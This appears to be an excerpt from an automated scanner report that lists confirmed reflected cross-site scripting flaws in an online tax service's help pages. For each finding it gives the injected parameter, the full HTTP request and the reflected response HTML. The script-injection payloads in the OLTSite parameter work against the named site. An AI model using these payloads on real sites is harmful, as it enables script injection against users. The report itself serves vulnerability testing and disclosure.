<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html lang="en_US"><!-- Head ->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>- --><head><meta http-equiv="Pragma" content="no-cache"/><meta http-equiv="Expires" content="-1"/><meta name="robots" content="noindex,nofollow"><link rel="stylesheet" type="text/css" href="https://www.olt.com/main/home/styles.css" /><link rel="stylesheet" type="text/css" href="/rnt/rnw/css/enduser.css"><title>Support Help</title></head><!-- Body ->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>- --><body class="bgcolor"><body topmargin="0" leftmargin="0" marginwidth="0" marginheight="0" bgcolor="#ffffff" text="#000000" link="#000000" vlink="#000000" alink="#000000"><table height="100" cellSpacing="0" cellPadding="0" width="790" border="0"> <tr> <td vAlign="bottom"> <table cellSpacing="0" cellPadding="0" width="100%" background="https://www.olt.com/main/home/images/tile-hdr.gif" border="0"> <tr> <td rowSpan="2"><img height="95" src="https://www.olt.com/main/home/images/spacer.gif" width="10"></td> <td rowSpan="2"><img src="https://www.olt.com/main/home/images/hdr-logo-home.gif" alt="Online Taxes OLT Logo" title="Online Taxes OLT Logo" width="200" height="95"></td> <td align="right" width="100%"><img src="https://www.olt.com/main/home/images/hdr-slogan.gif" alt="Online Taxes slogan - Simple fast Secure" title="Online Taxes Slogan - Simple Fast Accurate" width="175" height="40"></td> <td><img height="40" src="https://www.olt.com/main/home/images/spacer.gif" width="10"></td> </tr> <tr> <td class="hdrnav" vAlign="top" align="right"><nobr><a href="https://www.olt.com/main/home/default.asp">Home</a> &nbsp;|&nbsp; <a href="https://www.olt.com/main/home/about.asp">About Us</a> &nbsp;|&nbsp; <a href="https://www.olt.com/main/home/products.asp">Products</a> &nbsp;|&nbsp; <a href="https://www.olt.com/main/home/service.asp">Customer Service</a> &nbsp;|&nbsp; <a href="https://www.olt.com/main/home/states.asp">States</a> &nbsp;|&nbsp; <a href="https://www.olt.com/main/home/taxcorner.asp">Tax Corner</a></nobr></td> <td><img height="55" src="https://www.olt.com/main/home/images/spacer.gif" width="10"></td> </tr> </table> </td> </tr> </table><table><tr><td width="790"><br /><!-- Tab Area ->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>- --><table cellpadding="0" cellspacing="0" border="0" width="100%"> <tr> <td width="1%" valign="bottom"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td align="left" valign="top"><img src="/rnt/rnw/img/enduser/tabl.gif" width="6" height="6" alt="" /></td> <td width="100%" class="tab" name="&nbsp;answers&nbsp;_tab" align="center" rowspan="2" nowrap> <a class="tab" name="&nbsp;answers&nbsp;_tab_link" href="std_alp.php?OLTSite=OLTFree73541'"--%5E%5C/style%5E%5C/script%5E%5Cscript%5Enetsparker(0x0020AA)%5C/script%5E&p_sid=v6kDiKsk&amp;p_accessibility=1&amp;p_redirect=3&amp;p_sp=cF9zcmNoPSZwX3NvcnRfYnk9JnBfZ3JpZHNvcnQ9JnBfcm93X2NudD0xMzY2LDEzNjYmcF9wcm9kcz0mcF9jYXRzPSZwX3B2PSZwX2N2PSZwX3NlYXJjaF90eXBlPWFuc3dlcnMuc2VhcmNoX25sJnBfcGFnZT0x">&nbsp;Answers&nbsp;</a> </td> <td align="right" valign="top"><img src="/rnt/rnw/img/enduser/tabr.gif" width="6" height="6" alt="" /></td> </tr> <tr> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> </tr> </table> </td> <td width="1%">&nbsp;</td> <td width="1%" valign="bottom"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td align="left" valign="top"><img src="/rnt/rnw/img/enduser/tabl.gif" width="6" height="6" alt="" /></td> <td width="100%" class="tab" name="ask_a_question_tab" align="center" rowspan="2" nowrap> <a class="tab" name="ask_a_question_tab_link" href="ask.php?OLTSite=OLTFree73541'"--%5E%5C/style%5E%5C/script%5E%5Cscript%5Enetsparker(0x0020AA)%5C/script%5E&p_sid=v6kDiKsk&amp;p_accessibility=1&amp;p_redirect=3&amp;p_sp=cF9zcmNoPSZwX3NvcnRfYnk9JnBfZ3JpZHNvcnQ9JnBfcm93X2NudD0xMzY2LDEzNjYmcF9wcm9kcz0mcF9jYXRzPSZwX3B2PSZwX2N2PSZwX3NlYXJjaF90eXBlPWFuc3dlcnMuc2VhcmNoX25sJnBfcGFnZT0x">Ask a Question</a> </td> <td align="right" valign="top"><img src="/rnt/rnw/img/enduser/tabr.gif" width="6" height="6" alt="" /></td> </tr> <tr> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> </tr> </table> </td> <td width="1%">&nbsp;</td> <td width="1%" valign="bottom"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td align="left" valign="top"><img src="/rnt/rnw/img/enduser/tabl.gif" width="6" height="6" alt="" /></td> <td width="100%" class="tab" name="live_help_tab" align="center" rowspan="2" nowrap> <a class="tab" name="live_help_tab_link" href="chat.php?OLTSite=OLTFree73541'"--%5E%5C/style%5E%5C/script%5E%5Cscript%5Enetsparker(0x0020AA)%5C/script%5E&p_sid=v6kDiKsk&amp;p_accessibility=1&amp;p_redirect=3&amp;p_sp=cF9zcmNoPSZwX3NvcnRfYnk9JnBfZ3JpZHNvcnQ9JnBfcm93X2NudD0xMzY2LDEzNjYmcF9wcm9kcz0mcF9jYXRzPSZwX3B2PSZwX2N2PSZwX3NlYXJjaF90eXBlPWFuc3dlcnMuc2VhcmNoX25sJnBfcGFnZT0x">Live Help</a> </td> <td align="right" valign="top"><img src="/rnt/rnw/img/enduser/tabr.gif" width="6" height="6" alt="" /></td> </tr> <tr> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> </tr> </table> </td> <td width="1%">&nbsp;</td> <td width="1%" valign="bottom"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td align="left" valign="top"><img src="/rnt/rnw/img/enduser/tabl.gif" width="6" height="6" alt="" /></td> <td width="100%" class="tab" name="&nbsp;my_stuff&nbsp;_tab" align="center" rowspan="2" nowrap> <a class="tab" name="&nbsp;my_stuff&nbsp;_tab_link" href="myovr.php?OLTSite=OLTFree73541'"--%5E%5C/style%5E%5C/script%5E%5Cscript%5Enetsparker(0x0020AA)%5C/script%5E&p_sid=v6kDiKsk&amp;p_accessibility=1&amp;p_redirect=3&amp;p_sp=cF9zcmNoPSZwX3NvcnRfYnk9JnBfZ3JpZHNvcnQ9JnBfcm93X2NudD0xMzY2LDEzNjYmcF9wcm9kcz0mcF9jYXRzPSZwX3B2PSZwX2N2PSZwX3NlYXJjaF90eXBlPWFuc3dlcnMuc2VhcmNoX25sJnBfcGFnZT0x">&nbsp;My Stuff&nbsp;</a> </td> <td align="right" valign="top"><img src="/rnt/rnw/img/enduser/tabr.gif" width="6" height="6" alt="" /></td> </tr> <tr> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> </tr> </table> </td> <td width="1%">&nbsp;</td> <td width="80%"> <a href="accessibility.php?p_accessibility=0&p_redirect=3"> hide accessible links </a> &nbsp;</td> <td width="1%" valign="bottom"> <table width="1%" cellpadding="0" cellspacing="0" border="0"> <tr> <td width="1%" class="seltabbtn" align="left" valign="top"><img src="/rnt/rnw/img/trnsp.gif" width="1" height="6" alt="" /></td> <td width="2%" name="_tab" class="seltabbtn" align="center" valign="middle" nowrap rowspan="2"> <a class="seltabbtn" href="help_general.php?OLTSite=OLTFree73541'"--></style></script><script>netsparker(0x0020AA)</script>&p_sid=v6kDiKsk&amp;p_accessibility=1&amp;p_redirect=3&amp;p_sp=cF9zcmNoPSZwX3NvcnRfYnk9JnBfZ3JpZHNvcnQ9JnBfcm93X2NudD0xMzY2LDEzNjYmcF9wcm9kcz0mcF9jYXRzPSZwX3B2PSZwX2N2PSZwX3NlYXJjaF90eXBlPWFuc3dlcnMuc2VhcmNoX25sJnBfcGFnZT0x"> &nbsp;&nbsp;Help&nbsp;&nbsp; </a> </td> <td width="1%" class="seltabbtn" align="right" valign="top"><img src="/rnt/rnw/img/trnsp.gif" width="1" height="6" alt="" /></td> </tr> <tr> <td class="seltabbtn"> <img src="/rnt/rnw/img/trnsp.gif" width="1" height="14" alt="" /> </td> <td class="seltabbtn"> <img src="/rnt/rnw/img/trnsp.gif" width="1" height="14" alt="" /> </td> </tr> </table> </td> </tr><!-- Subtab Area ->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>- --> <tr> <td class="seltab" colspan="11"> <table cellpadding="0" cellspacing="4" border="0" width="100%"> <tr> <td class="subtabarea" align="center" width="50%"> <table cellpadding="0" cellspacing="0" border="0" width="60%"> <tr> <td align="right" rowspan="3"><img height="19" width="8" src="/rnt/rnw/img/enduser/stinl.gif" alt="" /></td> <td bgcolor="black"><img src="/rnt/rnw/img/trnsp.gif" width="1" height="2" alt="" /></td> <td align="left" rowspan="3"><img height="19" width="8" src="/rnt/rnw/img/enduser/stinr.gif" alt="" /></td> </tr> <tr> <td class="subtabbtn" name="general_help_tab_bar_btn" align="center" nowrap><a class="selsubtab" href="help_general.php?OLTSite=OLTFree73541'"--%5E%5C/style%5E%5C/script%5E%5Cscript%5Enetsparker(0x0020AA)%5C/script%5E&p_sid=v6kDiKsk&amp;p_accessibility=1&amp;p_redirect=3&amp;p_sp=cF9zcmNoPSZwX3NvcnRfYnk9JnBfZ3JpZHNvcnQ9JnBfcm93X2NudD0xMzY2LDEzNjYmcF9wcm9kcz0mcF9jYXRzPSZwX3B2PSZwX2N2PSZwX3NlYXJjaF90eXBlPWFuc3dlcnMuc2VhcmNoX25sJnBfcGFnZT0x&amp;p_depth=2">General Help</a></td> </tr> <tr> <td bgcolor="white"><img src="/rnt/rnw/img/trnsp.gif" width="1" height="2" alt="" /></td> </tr> </table> </td> <td class="subtabarea" align="center" width="50%"> <table cellpadding="0" cellspacing="0" border="0" width="60%"> <tr> <td align="right" rowspan="3"><img height="19" width="8" src="/rnt/rnw/img/enduser/stoutl.gif" alt="" /></td> <td bgcolor="white"><img src="/rnt/rnw/img/trnsp.gif" width="1" height="2" alt="" /></td> <td align="left" rowspan="3"><img height="19" width="8" src="/rnt/rnw/img/enduser/stoutr.gif" alt="" /></td> </tr> <tr> <td class="subtabbtn" name="search_tips_tab_bar_btn" align="center" nowrap><a class="subtab" href="help_search.php?OLTSite=OLTFree73541'"--%5E%5C/style%5E%5C/script%5E%5Cscript%5Enetsparker(0x0020AA)%5C/script%5E&p_sid=v6kDiKsk&amp;p_accessibility=1&amp;p_redirect=3&amp;p_sp=cF9zcmNoPSZwX3NvcnRfYnk9JnBfZ3JpZHNvcnQ9JnBfcm93X2NudD0xMzY2LDEzNjYmcF9wcm9kcz0mcF9jYXRzPSZwX3B2PSZwX2N2PSZwX3NlYXJjaF90eXBlPWFuc3dlcnMuc2VhcmNoX25sJnBfcGFnZT0x&amp;p_depth=2">Search Tips</a></td> </tr> <tr> <td bgcolor="black"><img src="/rnt/rnw/img/trnsp.gif" width="1" height="2" alt="" /></td> </tr> </table> </td> </tr> </table> </td> </tr> <tr><td colspan="10"></td></tr> <tr><td colspan="10"><img src="/rnt/rnw/img/trnsp.gif" width="1" height="4" alt="" /></td></tr></table><!-- Top border ->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>- --><table cellpadding="0" cellspacing="0" border="0" width="100%"><tr><td align="right"><img height="6" width="6" src="/rnt/rnw/img/enduser/tl.gif" alt="" /></td><td width="100%" class="form"><img height="6" width="1" src="/rnt/rnw/img/trnsp.gif" alt="" /></td><td align="left"><img height="6" width="6" src="/rnt/rnw/img/enduser/tr.gif" alt="" /></td></tr><!-- Help Text ->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>- --><tr><td class="form" align="right" rowspan="2"><img height="1" width="1" src="/rnt/rnw/img/trnsp.gif" alt="" /></td><td class="hcell"><span class="smtext">As you search for answers to your questions, you can easily move from one function to another using the tabs on the tab bar. <b>Be aware that you must have a customer account to access certain functions.</b><br><br>Note: This site contains the Accessible Links function in compliance with Section 508 of the Rehabilitation Act. It can be activated using accessibility software, such as a screen reader, or through this keystroke sequence: From a page other than Support Home, press <b>Tab</b> until the focus is on the My Stuff tab. Press <b>Tab</b> again and then press <b>Enter</b>.</span></td><td class="form" align="right" rowspan="2"><img height="1" width="1" src="/rnt/rnw/img/trnsp.gif" alt="" /></td></tr><tr><td class="form" align="right" ><img height="12" width="1" src="/rnt/rnw/img/trnsp.gif" alt="" /></td></tr><!-- Answers ->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>- --><tr><td class="form&quo..
- /cgi-bin/olt.cfg/php/enduser/help_search.php

/cgi-bin/olt.cfg/php/enduser/help_search.php CONFIRMED

https://olt.custhelp.com/cgi-bin/olt.cfg/php/enduser/help_search.php?OLTSite=OLTFree%0073541%00%27%2..

Parameters

Parameter Type Value
OLTSite GET OLTFree73541'"--></style></script><script>alert(0x002121)</script>
p_sid GET TyYLtJsk
p_accessibility GET 1
p_redirect GET 3
p_sp GET cF9zcmNoPSZwX3NvcnRfYnk9JnBfZ3JpZHNvcnQ9JnBfcm93X2NudD0xMzY2LDEzNjYmcF9wcm9kcz0mcF9jYXRzPSZwX3B2PSZwX2N2PSZwX3NlYXJjaF90eXBlPWFuc3dlcnMuc2VhcmNoX25sJnBfcGFnZT0x
p_depth GET 1

Request

GET /cgi-bin/olt.cfg/php/enduser/help_search.php?OLTSite=OLTFree%0073541%00%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker(0x002121)%3C%2Fscript%3E&p_sid=TyYLtJsk&p_accessibility=1&p_redirect=3&p_sp=cF9zcmNoPSZwX3NvcnRfYnk9JnBfZ3JpZHNvcnQ9JnBfcm93X2NudD0xMzY2LDEzNjYmcF9wcm9kcz0mcF9jYXRzPSZwX3B2PSZwX2N2PSZwX3NlYXJjaF90eXBlPWFuc3dlcnMuc2VhcmNoX25sJnBfcGFnZT0x&p_depth=1 HTTP/1.1
Referer: https://olt.custhelp.com/cgi-bin/olt.cfg/php/enduser/help_general.php?OLTSite=OLTFree%0073541&p_sid=TyYLtJsk&p_accessibility=0&p_redirect=&p_sp=cF9zcmNoPSZwX3NvcnRfYnk9JnBfZ3JpZHNvcnQ9JnBfcm93X2NudD0xMzY2LDEzNjYmcF9wcm9kcz0mcF9jYXRzPSZwX3B2PSZwX2N2PSZwX3NlYXJjaF90eXBlPWFuc3dlcnMuc2VhcmNoX25sJnBfcGFnZT0x
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
Cache-Control: no-cache
Host: olt.custhelp.com
Cookie: rnw_accessibility=1; rnw_enduser_login_start=LOGIN_START
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 00:03:16 GMT
Server: Apache
P3P: policyref="https://olt.custhelp.com/rnt/rnw/p3p/rnw_p3p_ref.xml",CP="CAO CURa ADMa DEVa OUR BUS IND UNI COM NAV"
RNT-Time: D=259263 t=1304121796575529
RNT-Machine: 03
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 3579
X-Cnection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html lang="en_US"><!-- Head ->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>- --><head><meta http-equiv="Pragma" content="no-cache"/><meta http-equiv="Expires" content="-1"/><meta name="robots" content="noindex,nofollow"><link rel="stylesheet" type="text/css" href="https://www.olt.com/main/home/styles.css" /><link rel="stylesheet" type="text/css" href="/rnt/rnw/css/enduser.css"><title>Search Tips</title></head><!-- Body ->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>- --><body class="bgcolor"><body topmargin="0" leftmargin="0" marginwidth="0" marginheight="0" bgcolor="#ffffff" text="#000000" link="#000000" vlink="#000000" alink="#000000"><table height="100" cellSpacing="0" cellPadding="0" width="790" border="0"> <tr> <td vAlign="bottom"> <table cellSpacing="0" cellPadding="0" width="100%" background="https://www.olt.com/main/home/images/tile-hdr.gif" border="0"> <tr> <td rowSpan="2"><img height="95" src="https://www.olt.com/main/home/images/spacer.gif" width="10"></td> <td rowSpan="2"><img src="https://www.olt.com/main/home/images/hdr-logo-home.gif" alt="Online Taxes OLT Logo" title="Online Taxes OLT Logo" width="200" height="95"></td> <td align="right" width="100%"><img src="https://www.olt.com/main/home/images/hdr-slogan.gif" alt="Online Taxes slogan - Simple fast Secure" title="Online Taxes Slogan - Simple Fast Accurate" width="175" height="40"></td> <td><img height="40" src="https://www.olt.com/main/home/images/spacer.gif" width="10"></td> </tr> <tr> <td class="hdrnav" vAlign="top" align="right"><nobr><a href="https://www.olt.com/main/home/default.asp">Home</a> &nbsp;|&nbsp; <a href="https://www.olt.com/main/home/about.asp">About Us</a> &nbsp;|&nbsp; <a href="https://www.olt.com/main/home/products.asp">Products</a> &nbsp;|&nbsp; <a href="https://www.olt.com/main/home/service.asp">Customer Service</a> &nbsp;|&nbsp; <a href="https://www.olt.com/main/home/states.asp">States</a> &nbsp;|&nbsp; <a href="https://www.olt.com/main/home/taxcorner.asp">Tax Corner</a></nobr></td> <td><img height="55" src="https://www.olt.com/main/home/images/spacer.gif" width="10"></td> </tr> </table> </td> </tr> </table><table><tr><td width="790"><br /><!-- Tab Area ->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>- --><table cellpadding="0" cellspacing="0" border="0" width="100%"> <tr> <td width="1%" valign="bottom"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td align="left" valign="top"><img src="/rnt/rnw/img/enduser/tabl.gif" width="6" height="6" alt="" /></td> <td width="100%" class="tab" name="&nbsp;answers&nbsp;_tab" align="center" rowspan="2" nowrap> <a class="tab" name="&nbsp;answers&nbsp;_tab_link" href="std_alp.php?OLTSite=OLTFree73541'"--%5E%5C/style%5E%5C/script%5E%5Cscript%5Enetsparker(0x002121)%5C/script%5E&p_sid=Q88OiKsk&amp;p_accessibility=1&amp;p_redirect=3&amp;p_sp=cF9zcmNoPSZwX3NvcnRfYnk9JnBfZ3JpZHNvcnQ9JnBfcm93X2NudD0xMzY2LDEzNjYmcF9wcm9kcz0mcF9jYXRzPSZwX3B2PSZwX2N2PSZwX3NlYXJjaF90eXBlPWFuc3dlcnMuc2VhcmNoX25sJnBfcGFnZT0x">&nbsp;Answers&nbsp;</a> </td> <td align="right" valign="top"><img src="/rnt/rnw/img/enduser/tabr.gif" width="6" height="6" alt="" /></td> </tr> <tr> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> </tr> </table> </td> <td width="1%">&nbsp;</td> <td width="1%" valign="bottom"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td align="left" valign="top"><img src="/rnt/rnw/img/enduser/tabl.gif" width="6" height="6" alt="" /></td> <td width="100%" class="tab" name="ask_a_question_tab" align="center" rowspan="2" nowrap> <a class="tab" name="ask_a_question_tab_link" href="ask.php?OLTSite=OLTFree73541'"--%5E%5C/style%5E%5C/script%5E%5Cscript%5Enetsparker(0x002121)%5C/script%5E&p_sid=Q88OiKsk&amp;p_accessibility=1&amp;p_redirect=3&amp;p_sp=cF9zcmNoPSZwX3NvcnRfYnk9JnBfZ3JpZHNvcnQ9JnBfcm93X2NudD0xMzY2LDEzNjYmcF9wcm9kcz0mcF9jYXRzPSZwX3B2PSZwX2N2PSZwX3NlYXJjaF90eXBlPWFuc3dlcnMuc2VhcmNoX25sJnBfcGFnZT0x">Ask a Question</a> </td> <td align="right" valign="top"><img src="/rnt/rnw/img/enduser/tabr.gif" width="6" height="6" alt="" /></td> </tr> <tr> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> </tr> </table> </td> <td width="1%">&nbsp;</td> <td width="1%" valign="bottom"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td align="left" valign="top"><img src="/rnt/rnw/img/enduser/tabl.gif" width="6" height="6" alt="" /></td> <td width="100%" class="tab" name="live_help_tab" align="center" rowspan="2" nowrap> <a class="tab" name="live_help_tab_link" href="chat.php?OLTSite=OLTFree73541'"--%5E%5C/style%5E%5C/script%5E%5Cscript%5Enetsparker(0x002121)%5C/script%5E&p_sid=Q88OiKsk&amp;p_accessibility=1&amp;p_redirect=3&amp;p_sp=cF9zcmNoPSZwX3NvcnRfYnk9JnBfZ3JpZHNvcnQ9JnBfcm93X2NudD0xMzY2LDEzNjYmcF9wcm9kcz0mcF9jYXRzPSZwX3B2PSZwX2N2PSZwX3NlYXJjaF90eXBlPWFuc3dlcnMuc2VhcmNoX25sJnBfcGFnZT0x">Live Help</a> </td> <td align="right" valign="top"><img src="/rnt/rnw/img/enduser/tabr.gif" width="6" height="6" alt="" /></td> </tr> <tr> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> </tr> </table> </td> <td width="1%">&nbsp;</td> <td width="1%" valign="bottom"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td align="left" valign="top"><img src="/rnt/rnw/img/enduser/tabl.gif" width="6" height="6" alt="" /></td> <td width="100%" class="tab" name="&nbsp;my_stuff&nbsp;_tab" align="center" rowspan="2" nowrap> <a class="tab" name="&nbsp;my_stuff&nbsp;_tab_link" href="myovr.php?OLTSite=OLTFree73541'"--%5E%5C/style%5E%5C/script%5E%5Cscript%5Enetsparker(0x002121)%5C/script%5E&p_sid=Q88OiKsk&amp;p_accessibility=1&amp;p_redirect=3&amp;p_sp=cF9zcmNoPSZwX3NvcnRfYnk9JnBfZ3JpZHNvcnQ9JnBfcm93X2NudD0xMzY2LDEzNjYmcF9wcm9kcz0mcF9jYXRzPSZwX3B2PSZwX2N2PSZwX3NlYXJjaF90eXBlPWFuc3dlcnMuc2VhcmNoX25sJnBfcGFnZT0x">&nbsp;My Stuff&nbsp;</a> </td> <td align="right" valign="top"><img src="/rnt/rnw/img/enduser/tabr.gif" width="6" height="6" alt="" /></td> </tr> <tr> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> </tr> </table> </td> <td width="1%">&nbsp;</td> <td width="80%"> <a href="accessibility.php?p_accessibility=0&p_redirect=3"> hide accessible links </a> &nbsp;</td> <td width="1%" valign="bottom"> <table width="1%" cellpadding="0" cellspacing="0" border="0"> <tr> <td width="1%" class="seltabbtn" align="left" valign="top"><img src="/rnt/rnw/img/trnsp.gif" width="1" height="6" alt="" /></td> <td width="2%" name="_tab" class="seltabbtn" align="center" valign="middle" nowrap rowspan="2"> <a class="seltabbtn" href="help_general.php?OLTSite=OLTFree73541'"--></style></script><script>netsparker(0x002121)</script>&p_sid=Q88OiKsk&amp;p_accessibility=1&amp;p_redirect=3&amp;p_sp=cF9zcmNoPSZwX3NvcnRfYnk9JnBfZ3JpZHNvcnQ9JnBfcm93X2NudD0xMzY2LDEzNjYmcF9wcm9kcz0mcF9jYXRzPSZwX3B2PSZwX2N2PSZwX3NlYXJjaF90eXBlPWFuc3dlcnMuc2VhcmNoX25sJnBfcGFnZT0x"> &nbsp;&nbsp;Help&nbsp;&nbsp; </a> </td> <td width="1%" class="seltabbtn" align="right" valign="top"><img src="/rnt/rnw/img/trnsp.gif" width="1" height="6" alt="" /></td> </tr> <tr> <td class="seltabbtn"> <img src="/rnt/rnw/img/trnsp.gif" width="1" height="14" alt="" /> </td> <td class="seltabbtn"> <img src="/rnt/rnw/img/trnsp.gif" width="1" height="14" alt="" /> </td> </tr> </table> </td> </tr><!-- Subtab Area ->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>- --> <tr> <td class="seltab" colspan="11"> <table cellpadding="0" cellspacing="4" border="0" width="100%"> <tr> <td class="subtabarea" align="center" width="50%"> <table cellpadding="0" cellspacing="0" border="0" width="60%"> <tr> <td align="right" rowspan="3"><img height="19" width="8" src="/rnt/rnw/img/enduser/stoutl.gif" alt="" /></td> <td bgcolor="white"><img src="/rnt/rnw/img/trnsp.gif" width="1" height="2" alt="" /></td> <td align="left" rowspan="3"><img height="19" width="8" src="/rnt/rnw/img/enduser/stoutr.gif" alt="" /></td> </tr> <tr> <td class="subtabbtn" name="general_help_tab_bar_btn" align="center" nowrap><a class="subtab" href="help_general.php?OLTSite=OLTFree73541'"--%5E%5C/style%5E%5C/script%5E%5Cscript%5Enetsparker(0x002121)%5C/script%5E&p_sid=Q88OiKsk&amp;p_accessibility=1&amp;p_redirect=3&amp;p_sp=cF9zcmNoPSZwX3NvcnRfYnk9JnBfZ3JpZHNvcnQ9JnBfcm93X2NudD0xMzY2LDEzNjYmcF9wcm9kcz0mcF9jYXRzPSZwX3B2PSZwX2N2PSZwX3NlYXJjaF90eXBlPWFuc3dlcnMuc2VhcmNoX25sJnBfcGFnZT0x&amp;p_depth=2">General Help</a></td> </tr> <tr> <td bgcolor="black"><img src="/rnt/rnw/img/trnsp.gif" width="1" height="2" alt="" /></td> </tr> </table> </td> <td class="subtabarea" align="center" width="50%"> <table cellpadding="0" cellspacing="0" border="0" width="60%"> <tr> <td align="right" rowspan="3"><img height="19" width="8" src="/rnt/rnw/img/enduser/stinl.gif" alt="" /></td> <td bgcolor="black"><img src="/rnt/rnw/img/trnsp.gif" width="1" height="2" alt="" /></td> <td align="left" rowspan="3"><img height="19" width="8" src="/rnt/rnw/img/enduser/stinr.gif" alt="" /></td> </tr> <tr> <td class="subtabbtn" name="search_tips_tab_bar_btn" align="center" nowrap><a class="selsubtab" href="help_search.php?OLTSite=OLTFree73541'"--%5E%5C/style%5E%5C/script%5E%5Cscript%5Enetsparker(0x002121)%5C/script%5E&p_sid=Q88OiKsk&amp;p_accessibility=1&amp;p_redirect=3&amp;p_sp=cF9zcmNoPSZwX3NvcnRfYnk9JnBfZ3JpZHNvcnQ9JnBfcm93X2NudD0xMzY2LDEzNjYmcF9wcm9kcz0mcF9jYXRzPSZwX3B2PSZwX2N2PSZwX3NlYXJjaF90eXBlPWFuc3dlcnMuc2VhcmNoX25sJnBfcGFnZT0x&amp;p_depth=2">Search Tips</a></td> </tr> <tr> <td bgcolor="white"><img src="/rnt/rnw/img/trnsp.gif" width="1" height="2" alt="" /></td> </tr> </table> </td> </tr> </table> </td> </tr> <tr><td colspan="10"></td></tr> <tr><td colspan="10"><img src="/rnt/rnw/img/trnsp.gif" width="1" height="4" alt="" /></td></tr></table><!-- Top bar ->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>- --><table cellpadding="0" cellspacing="0" border="0" width="100%"><tr><td align="right"><img height="6" width="6" src="/rnt/rnw/img/enduser/tl.gif" alt="" /></td><td width="100%" class="form" colspan="2"><img height="6" width="1" src="/rnt/rnw/img/trnsp.gif" alt="" /></td><td align="left"><img height="6" width="6" src="/rnt/rnw/img/enduser/tr.gif" alt="" /></td></tr><!-- Help Text ->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>- --> <tr><td class="form" align="right" rowspan="15"><img height="1" width="1" src="/rnt/rnw/img/trnsp.gif" alt="" /></td><td class="bar" colspan="2"><h2 class="subtitle">&nbsp;In general...</h2></td><td class="form" align="left" rowspan="15"><img height="1" width="1" src="/rnt/rnw/img/trnsp.gif" alt="" /></td> </tr><tr valign="top"><th width="20%" class="sideheading">Narrow your search</th><td class="htext">Select products and categories from the drop-down menus to narrow your search.</td></tr><tr valign="top"><th class="sideheading">To require words</th><td class="htext">Use a plus (+) symbol before a word to find only documents containing that word. <br><img height="1" width="40" src="/rnt/rnw/img/trnsp.gif" alt="" /> <i>Example</i>: Type <font color=darkgreen>+wildlife +bear</font> to find documents that contain both words <font color=darkgreen>wildlife</font> and <font color=darkgreen>bear</font>.<br/></td></tr><tr valign="top"><th class="sideheading">To exclude words</th><td class="htext">Use a..
- /cgi-bin/olt.cfg/php/enduser/ask.php

/cgi-bin/olt.cfg/php/enduser/ask.php CONFIRMED

https://olt.custhelp.com/cgi-bin/olt.cfg/php/enduser/ask.php?OLTSite=%00%27%22--%3E%3C%2Fstyle%3E%3C..

Parameters

Parameter Type Value
OLTSite GET '"--></style></script><script>alert(0x0021DF)</script>
p_sid GET TyYLtJsk
p_accessibility GET 1
p_redirect GET 3
p_lva GET 372
